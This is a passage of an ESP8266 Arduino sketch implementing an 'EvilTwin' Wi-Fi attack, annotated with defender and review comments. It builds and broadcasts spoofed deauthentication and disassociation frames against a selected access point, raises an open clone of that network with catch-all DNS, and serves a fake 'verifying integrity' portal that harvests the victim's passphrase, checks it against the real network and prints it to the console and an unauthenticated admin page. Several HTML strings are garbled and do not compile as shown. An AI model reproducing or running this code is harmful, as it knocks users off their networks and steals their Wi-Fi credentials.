© All rights reserved.
WiFi password:" +
"" + footer();
}
// One-time initialisation: brings up the management access point, the
// catch-all DNS responder and the HTTP routes.
//
// Defender notes:
//  - The management AP is created with the fixed SSID and passphrase below, so
//    an unmodified build can be spotted by that SSID during a wireless sweep.
//  - The DNS server answers every name ("*") with 192.168.4.1, so any lookup
//    made by a client of this AP resolves to the device's own web server.
//  - No route registered here gets an authentication check in this function;
//    "/admin" is reachable by any client associated with the AP.
void setup() {
Serial.begin(115200);
// Access point and station at once; the station side is used later by the
// WiFi.begin() call in handleIndex().
WiFi.mode(WIFI_AP_STA);
// NOTE(review): presumably required for the raw frame transmission done in
// sendPacket() -- confirm against the SDK documentation.
wifi_promiscuous_enable(1);
WiFi.softAPConfig(IPAddress(192, 168, 4, 1) , IPAddress(192, 168, 4, 1) , IPAddress(255, 255, 255, 0));
// Hard-coded management SSID and passphrase.
WiFi.softAP("WiPhi_34732", "Op00000000");
// Wildcard DNS on port 53: every hostname resolves to the device itself.
dnsServer.start(53, "*", IPAddress(192, 168, 4, 1));
webServer.on("/", handleIndex);
webServer.on("/result", handleResult);
webServer.on("/admin", handleAdmin);
// Unknown paths fall through to handleIndex as well.
webServer.onNotFound(handleIndex);
webServer.begin();
}
// Refreshes the cached network list: runs a scan, calls clearArray(), then
// stores SSID, BSSID and channel for at most the first 16 results.
// clearArray(), _Network and _networks are defined elsewhere in the file;
// clearArray() presumably resets _networks -- confirm.
void performScan() {
  const int found = WiFi.scanNetworks();
  clearArray();

  // A negative count stores nothing.
  if (found < 0) {
    return;
  }

  // The handlers iterate over 16 slots, so never store more than that.
  const int limit = (found < 16) ? found : 16;
  for (int idx = 0; idx < limit; ++idx) {
    _Network entry;
    entry.ssid = WiFi.SSID(idx);

    const uint8_t* mac = WiFi.BSSID(idx);
    for (int octet = 0; octet < 6; ++octet) {
      entry.bssid[octet] = mac[octet];
    }

    entry.ch = WiFi.channel(idx);
    _networks[idx] = entry;
  }
}
// True while the soft AP advertises the selected network's SSID instead of the
// management SSID (toggled in handleIndex()/handleAdmin(), cleared in
// handleResult() on success).
bool hotspot_active = false;
// True while loop() periodically transmits deauthentication/disassociation
// frames for the selected network.
bool deauthing_active = false;
// Handler for "/result": reports whether the station interface managed to join
// the selected network with the passphrase submitted through the portal form
// (the join attempt itself is started in handleIndex()).
//
// NOTE(review): the string literal passed to send() in the failure branch is
// spread over several lines; its HTML tags appear to have been lost when this
// listing was extracted, so the block does not compile as shown.
//
// Defender notes: on success the submitted passphrase is kept in plain text in
// _correct and printed to the serial console, and the cloned SSID is torn down
// and replaced by the management AP again. The value in _correct is later
// concatenated into the admin page without HTML escaping.
void handleResult() {
// NOTE(review): `html` is never used in this function.
String html = "";
// Not connected means the submitted passphrase did not let the station join.
if (WiFi.status() != WL_CONNECTED) {
if (webServer.arg("deauth") == "start") {
deauthing_active = true;
}
// Error page; the script sends the browser back to "/" after 4 seconds.
webServer.send(200, "text/html", "<script> setTimeout(function(){window.location.href = '/';}, 4000); </script>
⊗
Wrong Password
Please, try again.
");
Serial.println("Wrong password tried!");
} else {
// Joined the real network: record SSID and passphrase for the admin page.
_correct = "Successfully got password for: " + _selectedNetwork.ssid + " Password: " + _tryPassword;
hotspot_active = false;
// Tear down the cloned AP and restore the management AP and wildcard DNS.
dnsServer.stop();
int n = WiFi.softAPdisconnect (true);
Serial.println(String(n));
WiFi.softAPConfig(IPAddress(192, 168, 4, 1) , IPAddress(192, 168, 4, 1) , IPAddress(255, 255, 255, 0));
WiFi.softAP("WiPhi_34732", "Op00000000");
dnsServer.start(53, "*", IPAddress(192, 168, 4, 1));
Serial.println("Good password was entered !");
// Writes the captured passphrase to the serial console in clear text.
Serial.println(_correct);
}
}
// Page template copied by handleIndex() and handleAdmin() before they append
// the network table. The visible placeholders are {disabled}, {deauth_button}
// and {hotspot_button}; the handlers also replace {deauth} and {hotspot},
// which do not appear in the text below.
// NOTE(review): most of the markup in this literal (the lines holding only a
// quote character) appears to have been lost when the listing was extracted,
// so the declaration does not compile as shown.
String _tempHTML = ""
"<style> .content {max-width: 500px;margin: auto;}table, th, td {border: 1px solid black;border-collapse: collapse;padding-left:10px;padding-right:10px;}</style>"
"
"
"
"
"<button style='display:inline-block;'{disabled}>{deauth_button}"
""
"<button style='display:inline-block;'{disabled}>{hotspot_button}"
"
";
// Handler for "/" and for every unknown path (see setup()). It serves two
// different audiences depending on hotspot_active:
//  - false: the operator's control page (network table plus toggle buttons);
//  - true:  the portal page returned by index(), or, when a "password"
//           argument is present, an attempt to join the real network with it.
//
// Request arguments "ap", "deauth" and "hotspot" change device state before any
// page is built; nothing in this function authenticates the requester.
//
// Defender notes:
//  - The cloned AP is started with an SSID only (no passphrase), i.e. as an
//    open network. An unencrypted network carrying the name of a protected one
//    is the visible symptom on client devices.
//  - Scanned SSIDs and the stored _correct text are concatenated into the HTML
//    without escaping.
void handleIndex() {
// "ap" carries a BSSID string; the matching cached entry becomes the selection.
if (webServer.hasArg("ap")) {
for (int i = 0; i < 16; i++) {
if (bytesToStr(_networks[i].bssid, 6) == webServer.arg("ap") ) {
_selectedNetwork = _networks[i];
}
}
}
// "deauth=start|stop" switches the periodic frame transmission in loop().
if (webServer.hasArg("deauth")) {
if (webServer.arg("deauth") == "start") {
deauthing_active = true;
} else if (webServer.arg("deauth") == "stop") {
deauthing_active = false;
}
}
// "hotspot=start|stop" swaps the soft AP between the cloned SSID and the
// management SSID. This path returns without sending any HTTP response.
if (webServer.hasArg("hotspot")) {
if (webServer.arg("hotspot") == "start") {
hotspot_active = true;
dnsServer.stop();
int n = WiFi.softAPdisconnect (true);
Serial.println(String(n));
WiFi.softAPConfig(IPAddress(192, 168, 4, 1) , IPAddress(192, 168, 4, 1) , IPAddress(255, 255, 255, 0));
// SSID only, no passphrase: the clone is an open network.
WiFi.softAP(_selectedNetwork.ssid.c_str());
dnsServer.start(53, "*", IPAddress(192, 168, 4, 1));
} else if (webServer.arg("hotspot") == "stop") {
hotspot_active = false;
dnsServer.stop();
int n = WiFi.softAPdisconnect (true);
Serial.println(String(n));
WiFi.softAPConfig(IPAddress(192, 168, 4, 1) , IPAddress(192, 168, 4, 1) , IPAddress(255, 255, 255, 0));
WiFi.softAP("WiPhi_34732", "Op00000000");
dnsServer.start(53, "*", IPAddress(192, 168, 4, 1));
}
return;
}
// Control page: shown only while the cloned AP is not running.
if (hotspot_active == false) {
String _html = _tempHTML;
for (int i = 0; i < 16; ++i) {
// An empty SSID marks the end of the cached scan results.
if ( _networks[i].ssid == "") {
break;
}
// NOTE(review): the SSID comes from whatever access points are in range and
// is inserted into the page without HTML escaping.
_html += "<tr><td>" + _networks[i].ssid + "</td><td>" + bytesToStr(_networks[i].bssid, 6) + "</td><td>" + String(_networks[i].ch) + "<td><form method='post' action='/?ap=" + bytesToStr(_networks[i].bssid, 6) + "'>";
if (bytesToStr(_selectedNetwork.bssid, 6) == bytesToStr(_networks[i].bssid, 6)) {
_html += "<button style='background-color: #90ee90;'>Selected</button></form></td></tr>";
} else {
_html += "<button>Select</button></form></td></tr>";
}
}
if (deauthing_active) {
_html.replace("{deauth_button}", "Stop deauthing");
_html.replace("{deauth}", "stop");
} else {
_html.replace("{deauth_button}", "Start deauthing");
_html.replace("{deauth}", "start");
}
// NOTE(review): hotspot_active is always false inside this branch, so only
// the else arm below can run.
if (hotspot_active) {
_html.replace("{hotspot_button}", "Stop EvilTwin");
_html.replace("{hotspot}", "stop");
} else {
_html.replace("{hotspot_button}", "Start EvilTwin");
_html.replace("{hotspot}", "start");
}
// The toggle buttons stay disabled until a network has been selected.
if (_selectedNetwork.ssid == "") {
_html.replace("{disabled}", " disabled");
} else {
_html.replace("{disabled}", "");
}
_html += "</table>";
// NOTE(review): _correct holds the SSID and the submitted passphrase and is
// emitted without HTML escaping.
if (_correct != "") {
_html += "</br><h3>" + _correct + "</h3>";
}
_html += "</div></body></html>";
webServer.send(200, "text/html", _html);
} else {
// Portal mode: the cloned AP is running and clients are being served.
if (webServer.hasArg("password")) {
// Keep the submitted value; handleResult() reports it on success.
_tryPassword = webServer.arg("password");
if (webServer.arg("deauth") == "start") {
deauthing_active = false;
}
delay(1000);
// Validate the submitted passphrase by trying to join the real network on
// its recorded channel and BSSID; handleResult() checks the outcome.
WiFi.disconnect();
WiFi.begin(_selectedNetwork.ssid.c_str(), webServer.arg("password").c_str(), _selectedNetwork.ch, _selectedNetwork.bssid);
// Waiting page; the script loads "/result" after 15 seconds.
webServer.send(200, "text/html", "<!DOCTYPE html> <html><script> setTimeout(function(){window.location.href = '/result';}, 15000); </script></head><body><center><h2 style='font-size:7vw'>Verifying integrity, please wait...<br><progress value='10' max='100'>10%</progress></h2></center></body> </html>");
if (webServer.arg("deauth") == "start") {
deauthing_active = true;
}
} else {
// index() is defined earlier in the file, outside this listing.
webServer.send(200, "text/html", index());
}
}
}
// Handler for "/admin": always renders the operator's control page, whatever
// the value of hotspot_active. The argument handling ("ap", "deauth",
// "hotspot") duplicates handleIndex() and, like there, nothing in this function
// authenticates the requester.
//
// NOTE(review): the string literals that build the table rows and the closing
// markup are spread over several lines; their HTML tags appear to have been
// lost when this listing was extracted, so the block does not compile as shown.
//
// Defender notes: scanned SSIDs and the stored _correct text (SSID plus
// submitted passphrase) are concatenated into the page without HTML escaping.
void handleAdmin() {
String _html = _tempHTML;
// "ap" carries a BSSID string; the matching cached entry becomes the selection.
if (webServer.hasArg("ap")) {
for (int i = 0; i < 16; i++) {
if (bytesToStr(_networks[i].bssid, 6) == webServer.arg("ap") ) {
_selectedNetwork = _networks[i];
}
}
}
// "deauth=start|stop" switches the periodic frame transmission in loop().
if (webServer.hasArg("deauth")) {
if (webServer.arg("deauth") == "start") {
deauthing_active = true;
} else if (webServer.arg("deauth") == "stop") {
deauthing_active = false;
}
}
// "hotspot=start|stop" swaps the soft AP between the cloned SSID and the
// management SSID. This path returns without sending any HTTP response.
if (webServer.hasArg("hotspot")) {
if (webServer.arg("hotspot") == "start") {
hotspot_active = true;
dnsServer.stop();
int n = WiFi.softAPdisconnect (true);
Serial.println(String(n));
WiFi.softAPConfig(IPAddress(192, 168, 4, 1) , IPAddress(192, 168, 4, 1) , IPAddress(255, 255, 255, 0));
// SSID only, no passphrase: the clone is an open network.
WiFi.softAP(_selectedNetwork.ssid.c_str());
dnsServer.start(53, "*", IPAddress(192, 168, 4, 1));
} else if (webServer.arg("hotspot") == "stop") {
hotspot_active = false;
dnsServer.stop();
int n = WiFi.softAPdisconnect (true);
Serial.println(String(n));
WiFi.softAPConfig(IPAddress(192, 168, 4, 1) , IPAddress(192, 168, 4, 1) , IPAddress(255, 255, 255, 0));
WiFi.softAP("WiPhi_34732", "Op00000000");
dnsServer.start(53, "*", IPAddress(192, 168, 4, 1));
}
return;
}
for (int i = 0; i < 16; ++i) {
// An empty SSID marks the end of the cached scan results.
if ( _networks[i].ssid == "") {
break;
}
// One table row per cached network (row markup lost in extraction).
_html += "
SSID | BSSID | Channel | Select |
" + _networks[i].ssid + " | " + bytesToStr(_networks[i].bssid, 6) + " | " + String(_networks[i].ch) + " | ";
if ( bytesToStr(_selectedNetwork.bssid, 6) == bytesToStr(_networks[i].bssid, 6)) {
_html += "<button style='background-color: #90ee90;'>Selected</button></form></td></tr>";
} else {
_html += "<button>Select</button></form></td></tr>";
}
}
if (deauthing_active) {
_html.replace("{deauth_button}", "Stop deauthing");
_html.replace("{deauth}", "stop");
} else {
_html.replace("{deauth_button}", "Start deauthing");
_html.replace("{deauth}", "start");
}
if (hotspot_active) {
_html.replace("{hotspot_button}", "Stop EvilTwin");
_html.replace("{hotspot}", "stop");
} else {
_html.replace("{hotspot_button}", "Start EvilTwin");
_html.replace("{hotspot}", "start");
}
// The toggle buttons stay disabled until a network has been selected.
if (_selectedNetwork.ssid == "") {
_html.replace("{disabled}", " disabled");
} else {
_html.replace("{disabled}", "");
}
// Append the stored result text, if any, without escaping.
if (_correct != "") {
_html += "
" + _correct + "";
}
_html += " |
";
webServer.send(200, "text/html", _html);
}
// Renders `size` bytes from `b` as two-digit hex values joined by ':'.
// Used throughout the file to turn a 6-byte BSSID into its text form.
// Returns an empty String when size is 0.
String bytesToStr(const uint8_t* b, uint32_t size) {
  String text;
  for (uint32_t pos = 0; pos < size; ++pos) {
    // Separator goes between bytes, never before the first or after the last.
    if (pos > 0) {
      text += ':';
    }
    const uint8_t value = b[pos];
    // String(value, HEX) drops the leading zero, so pad single-digit values.
    if (value < 0x10) {
      text += '0';
    }
    text += String(value, HEX);
  }
  return text;
}
// millis() timestamp of the last network scan (loop() rescans every 15 s).
unsigned long now = 0;
// millis() timestamp of the last 2 s tick in loop(); the tick body is
// currently commented out.
unsigned long wifinow = 0;
// millis() timestamp of the last deauth/disassociation transmission
// (loop() sends at most once every 200 ms).
unsigned long deauth_now = 0;
// Switches the radio to wifi_channel and passes the raw frame to the SDK.
//
// packet       frame bytes to transmit
// packetSize   number of bytes in packet
// wifi_channel channel the radio is set to before sending
// Returns true when wifi_send_pkt_freedom() returns 0.
//
// Side effects: changes the radio channel and prints the channel number (and
// "done" on success) to the serial console on every call.
bool sendPacket(uint8_t* packet, uint16_t packetSize, uint8_t wifi_channel) {
Serial.println(wifi_channel);
// Serial.println(bytesToStr(packet, 26));
wifi_set_channel(wifi_channel);
bool sent = wifi_send_pkt_freedom(packet, packetSize, 0) == 0;
if (sent) Serial.println("done");
return sent;
}
// Main loop: services DNS and HTTP, transmits the management frames while
// deauthing_active is set, and rescans for networks every 15 seconds.
//
// Defender notes: the frames built here are addressed to the broadcast
// address, carry the selected AP's BSSID as source, use reason code 1 and are
// sent at most once every 200 ms. A wireless IDS can alert on that pattern
// (repeated broadcast deauthentication/disassociation frames claiming to come
// from a known BSSID). Clients and APs that enforce 802.11w Protected
// Management Frames (mandatory in WPA3) discard unauthenticated frames of this
// kind.
void loop() {
dnsServer.processNextRequest();
webServer.handleClient();
// Unsigned subtraction keeps the interval check valid across millis() rollover.
if (deauthing_active && millis() - deauth_now >= 200) {
// Field layout (see the annotated copy in the commented-out block below):
// bytes 0-1 type/subtype, 2-3 duration, 4-9 receiver, 10-15 source,
// 16-21 BSSID, 22-23 fragment/sequence number, 24-25 reason code.
uint8_t packet[26] = {
0xC0, 0x00,
0x00, 0x00,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00,
0x01, 0x00
};
// NOTE(review): `success` is assigned below but never read.
bool success = false;
// Source and BSSID fields both take the selected AP's BSSID.
memcpy(&packet[10], _selectedNetwork.bssid, 6);
memcpy(&packet[16], _selectedNetwork.bssid, 6);
if (sendPacket(packet, sizeof(packet), _selectedNetwork.ch)) {
success = true;
}
// send disassociate frame
packet[0] = 0xa0;
if (sendPacket(packet, sizeof(packet), _selectedNetwork.ch)) {
success = true;
}
// Earlier experiments, left disabled by the author:
// uint8_t* apMac;
// uint8_t reason;
// uint8_t ch;
// apMac = _selectedNetwork.bssid;
// uint8_t stMac[6] = {0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF};
// reason = 1;
// ch = _selectedNetwork.ch;
// deauthDevice(apMac, stMac, reason, ch);
// uint8_t deauthPacket[26] = {
// /* 0 - 1 */ 0xC0, 0x00, // type, subtype c0: deauth (a0: disassociate)
// /* 2 - 3 */ 0x00, 0x00, // duration (SDK takes care of that)
// /* 4 - 9 */ 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, // receiver (target)
// /* 10 - 15 */ 0xb6, 0x69, 0x21, 0x74, 0x02, 0xb6, // source (ap)
// /* 16 - 21 */ 0xb6, 0x69, 0x21, 0x74, 0x02, 0xb6, // BSSID (ap)
// /* 22 - 23 */ 0x00, 0x00, // fragment & sequence number
// /* 24 - 25 */ 0x01, 0x00 // reason code (1 = unspecified reason)
// };
// packetSize = sizeof(deauthPacket);
// uint8_t deauthpkt[packetSize];
// uint8_t broadcast[] = {0x32, 0xAE, 0xA4, 0x07, 0x0D, 0x66};
// memcpy(deauthpkt, deauthPacket, packetSize);
// memcpy(&deauthpkt[4], broadcast, 6);
// // memcpy(&deauthpkt[10], _selectedNetwork.bssid, 6);
// // memcpy(&deauthpkt[16], _selectedNetwork.bssid, 6);
// deauthpkt[24] = 1;
// Serial.println(bytesToStr(deauthPacket, 26));
// deauthpkt[0] = 0xc0;
// wifi_set_channel(_selectedNetwork.ch);
// Serial.println(wifi_send_pkt_freedom(deauthpkt, sizeof(deauthPacket), 0));
// Serial.println(bytesToStr(deauthPacket, 26));
// uint8_t disassocpkt[packetSize];
// memcpy(disassocpkt, deauthpkt, packetSize);
// disassocpkt[0] = 0Xa0;
// Serial.println(wifi_send_pkt_freedom(disassocpkt, sizeof(deauthPacket), 0));
// deauth_now = millis();
// packetSize = sizeof(deauthPacket);
// uint8_t deauthpkt[sizeof(deauthPacket)];
// memcpy(deauthpkt, deauthPacket, packetSize);
// memcpy(&deauthPacket[4], broadcast, 6);
// memcpy(&deauthPacket[10], _selectedNetwork.bssid, 6);
// memcpy(&deauthPacket[16], _selectedNetwork.bssid, 6);
// uint8_t deauthPacket[24] = 1;
// // send deauth frame
// uint8_t deauthPacket[0] = 0xc0;
// wifi_set_channel(_selectedNetwork.ch);
// wifi_send_pkt_freedom(deauthPacket, sizeof(deauthPacket), _selectedNetwork.ch) == 0;
// // send disassociate frame
// // uint8_t disassocpkt[packetSize];
// // memcpy(disassocpkt, deauthPacket, packetSize);
// uint8_t disassocpkt[0] = 0xa0;
// wifi_set_channel(_selectedNetwork.ch);
// wifi_send_pkt_freedom(deauthPacket, sizeof(deauthPacket), _selectedNetwork.ch) == 0;
deauth_now = millis();
}
// Refresh the cached network list every 15 seconds.
if (millis() - now >= 15000) {
performScan();
now = millis();
}
// 2-second tick; the connection-status logging it once held is disabled.
if (millis() - wifinow >= 2000) {
// if (WiFi.status() != WL_CONNECTED) {
// Serial.println("BAD");
// } else {
// Serial.println("GOOD");
// }
wifinow = millis();
}
}